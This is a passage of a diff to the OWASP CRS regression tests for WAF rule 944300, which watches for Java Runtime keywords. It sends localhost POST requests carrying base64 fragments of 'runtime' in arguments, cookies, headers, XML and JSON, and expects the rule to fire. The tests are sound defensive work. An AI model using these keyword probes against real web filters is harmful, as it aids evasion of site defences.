- data: "test=cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log: + expect_ids: [944300] + - test_id: 2 desc: "Argument name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ=test" + output: + log: + expect_ids: [944300] + - test_id: 3 desc: "Cookie test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cnVudGltZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cnVudGltZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 4 desc: "Cookie name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cnVudGltZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cnVudGltZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 5 desc: "Request header test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cnVudGltZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cnVudGltZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 6 desc: "XML attribute value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 7 desc: "XML element value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log: + expect_ids: [944300] + - test_id: 8 desc: "Nested XML element value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log: + expect_ids: [944300] + - test_id: 9 desc: "Content-Type text/plain includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log: + expect_ids: [944300] + - test_id: 10 desc: "Content-Type application/json arg value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cnVudGltZQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cnVudGltZQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 11 desc: "Content-Type application/json arg name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cnVudGltZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cnVudGltZQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 12 desc: "Argument test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log: + expect_ids: [944300] + - test_id: 13 desc: "Argument name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU=test" + output: + log: + expect_ids: [944300] + - test_id: 14 desc: "Cookie test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HJ1bnRpbWU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HJ1bnRpbWU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 15 desc: "Cookie name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HJ1bnRpbWU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HJ1bnRpbWU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 16 desc: "Request header test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HJ1bnRpbWU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HJ1bnRpbWU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 17 desc: "XML attribute value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 18 desc: "XML element value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log: + expect_ids: [944300] + - test_id: 19 desc: "Nested XML element value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log: + expect_ids: [944300] + - test_id: 20 desc: "Content-Type text/plain includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log: + expect_ids: [944300] + - test_id: 21 desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HJ1bnRpbWU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HJ1bnRpbWU\"}" + output: + log: + expect_ids: [944300] + - test_id: 22 desc: "Content-Type application/json arg name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HJ1bnRpbWU\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HJ1bnRpbWU\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 23 desc: "Argument test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log: + expect_ids: [944300] + - test_id: 24 desc: "Argument name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l=test" + output: + log: + expect_ids: [944300] + - test_id: 25 desc: "Cookie test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BydW50aW1l - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BydW50aW1l + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 26 desc: "Cookie name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BydW50aW1l=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BydW50aW1l=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 27 desc: "Request header test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BydW50aW1l - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BydW50aW1l + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 28 desc: "XML attribute value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 29 desc: "XML element value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: 